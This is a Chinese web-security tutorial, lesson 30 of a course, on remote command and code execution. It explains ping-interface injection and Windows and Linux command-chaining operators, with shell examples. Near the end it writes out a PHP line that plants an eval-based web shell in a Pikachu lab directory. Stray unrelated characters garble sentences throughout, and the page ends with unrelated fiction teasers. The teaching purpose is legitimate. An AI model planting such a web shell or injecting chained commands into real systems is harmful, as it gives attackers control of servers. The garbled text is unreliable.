風(fēng)炫安全web安全學(xué)習(xí)第三十節(jié)課 命令執(zhí)行&代碼執(zhí)行基礎(chǔ)

風(fēng)炫安全web安全學(xué)習(xí)第三十節(jié)課 命令執(zhí)行&代碼執(zhí)行基礎(chǔ)

代碼執(zhí)行&命令執(zhí)行

RCE漏洞,可以讓攻擊者直接向后臺(tái)服務(wù)器遠(yuǎn)程注入操作系統(tǒng)命令或者代碼疚膊,從而控制后臺(tái)系統(tǒng)喂江。

遠(yuǎn)程系統(tǒng)命令執(zhí)行
一般出現(xiàn)這種漏洞鲜侥,是因?yàn)閼?yīng)用系統(tǒng)從設(shè)計(jì)上需要給用戶提供指定的遠(yuǎn)程命令操作的接口
  比如我們常見的路由器仲器、防火墻稻爬、入侵檢測(cè)等設(shè)備的web管理界面上
一般會(huì)給用戶提供一個(gè)ping操作的web界面,用戶從web界面輸入目標(biāo)IP秘车,提交后,后臺(tái)會(huì)對(duì)該IP地址進(jìn)行一次ping測(cè)試劫哼,并返回測(cè)試結(jié)果叮趴。而,如果权烧,設(shè)計(jì)者在完成該功能時(shí)眯亦,沒有做嚴(yán)格的安全控制,則可能會(huì)導(dǎo)致攻擊者通過該接口提交“意想不到”的命令般码,從而讓后臺(tái)進(jìn)行執(zhí)行妻率,從而控制整個(gè)后臺(tái)服務(wù)器

Windows系統(tǒng)命令拼接

  1. “|”:管道符,前面命令標(biāo)準(zhǔn)輸出板祝,后面命令的標(biāo)準(zhǔn)輸入宫静。例如:help |more
  2. “&” commandA & commandB 先運(yùn)行命令A(yù),然后運(yùn)行命令B
  3. “||” commandA || commandB 運(yùn)行命令A(yù),如果失敗則運(yùn)行命令B
  4. “&&” commandA && commandB 運(yùn)行命令A(yù)孤里,如果成功則運(yùn)行命令B

LINUX下系統(tǒng)命令拼接

  1. 伏伯;分號(hào)(;) 可以進(jìn)行多條命令的無關(guān)聯(lián)執(zhí)行,每一條執(zhí)行結(jié)果不會(huì)影響其他命令的執(zhí)行

    ls ; cat file
    
  1. && 邏輯與, 左邊的command1執(zhí)行成功(返回0表示成功)后捌袜,&&右邊的command2才能被執(zhí)行说搅。

    ?   asdasdasd &&  cat testfile
    zsh: command not found: asdasdasd
    
    ?  ls && cat testfile
    dvwa       pikachu    subject01  subject02  test.html  test2.html test3.html testenv    testfile
    test 30
    hello 95
    linux 85
    
  1. || 邏輯或,如果 || 左邊的command1執(zhí)行失敗(返回1表示失敗),才執(zhí)行||右邊的command2虏等,否則不執(zhí)行command2弄唧,具有短路功能。

    ?  asdasda || cat testfile
    zsh: command not found: asdasda
    test 30
    hello 95
    linux 85
    ?  ls  || cat testfile
    dvwa       pikachu    subject01  subject02  test.html  test2.html test3.html testenv    testfile
    
  1. | 管道符霍衫,當(dāng)用此連接符連接多個(gè)命令時(shí)候引,前面命令執(zhí)行的正確輸出,會(huì)交給后面的命令繼續(xù)處理慕淡。若前面的命令執(zhí)行失敗背伴,則會(huì)報(bào)錯(cuò),若后面的命令無法處理前面命令的輸出峰髓,也會(huì)報(bào)錯(cuò)傻寂。

    ?   cat testfile
    test 30
    hello 95
    linux 85
    ? cat testfile | grep -n "hello"
    2:hello 95
    ?  grep -n "hello" testfile
    2:hello 95
    
  1. () 如果想執(zhí)行幾個(gè)命令,則需要用命令分隔符分號(hào)隔開每個(gè)命令携兵,并使用圓括號(hào)()把所有命令組合起來疾掰。

    結(jié)合||和&&可以實(shí)現(xiàn)復(fù)雜的功能。

    ?   sort testfile
    hello 95
    linux 85
    test 30
    ?   sort testfile > test.sort && (cp test.sort /tmp/; cat /tmp/test.sort)
    hello 95
    linux 85
    test 30
    
file_put_contents('/var/www/html/pikachu/vul/rce/x.php', '<?php eval($_GET[w]);?>')

參考:
http://blog.evalshell.com/2020/12/20/風(fēng)炫安全web安全學(xué)習(xí)第三十節(jié)課-命令執(zhí)行代碼執(zhí)行/

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末徐紧,一起剝皮案震驚了整個(gè)濱河市静檬,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌并级,老刑警劉巖拂檩,帶你破解...
    沈念sama閱讀 219,490評(píng)論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異嘲碧,居然都是意外死亡稻励,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,581評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門愈涩,熙熙樓的掌柜王于貴愁眉苦臉地迎上來望抽,“玉大人,你說我怎么就攤上這事履婉∶焊荩” “怎么了?”我有些...
    開封第一講書人閱讀 165,830評(píng)論 0 356
  • 文/不壞的土叔 我叫張陵毁腿,是天一觀的道長辑奈。 經(jīng)常有香客問我苛茂,道長,這世上最難降的妖魔是什么身害? 我笑而不...
    開封第一講書人閱讀 58,957評(píng)論 1 295
  • 正文 為了忘掉前任味悄,我火速辦了婚禮,結(jié)果婚禮上塌鸯,老公的妹妹穿的比我還像新娘侍瑟。我一直安慰自己,他們只是感情好丙猬,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,974評(píng)論 6 393
  • 文/花漫 我一把揭開白布涨颜。 她就那樣靜靜地躺著,像睡著了一般茧球。 火紅的嫁衣襯著肌膚如雪庭瑰。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,754評(píng)論 1 307
  • 那天抢埋,我揣著相機(jī)與錄音弹灭,去河邊找鬼。 笑死揪垄,一個(gè)胖子當(dāng)著我的面吹牛穷吮,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播饥努,決...
    沈念sama閱讀 40,464評(píng)論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼捡鱼,長吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了酷愧?” 一聲冷哼從身側(cè)響起驾诈,我...
    開封第一講書人閱讀 39,357評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎溶浴,沒想到半個(gè)月后乍迄,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,847評(píng)論 1 317
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡士败,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,995評(píng)論 3 338
  • 正文 我和宋清朗相戀三年就乓,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片拱烁。...
    茶點(diǎn)故事閱讀 40,137評(píng)論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖噩翠,靈堂內(nèi)的尸體忽然破棺而出戏自,到底是詐尸還是另有隱情,我是刑警寧澤伤锚,帶...
    沈念sama閱讀 35,819評(píng)論 5 346
  • 正文 年R本政府宣布擅笔,位于F島的核電站志衣,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏猛们。R本人自食惡果不足惜念脯,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,482評(píng)論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望弯淘。 院中可真熱鬧绿店,春花似錦、人聲如沸庐橙。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,023評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽态鳖。三九已至转培,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間浆竭,已是汗流浹背浸须。 一陣腳步聲響...
    開封第一講書人閱讀 33,149評(píng)論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留邦泄,地道東北人删窒。 一個(gè)月前我還...
    沈念sama閱讀 48,409評(píng)論 3 373
  • 正文 我出身青樓,卻偏偏與公主長得像虎韵,于是被迫代替她去往敵國和親易稠。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,086評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容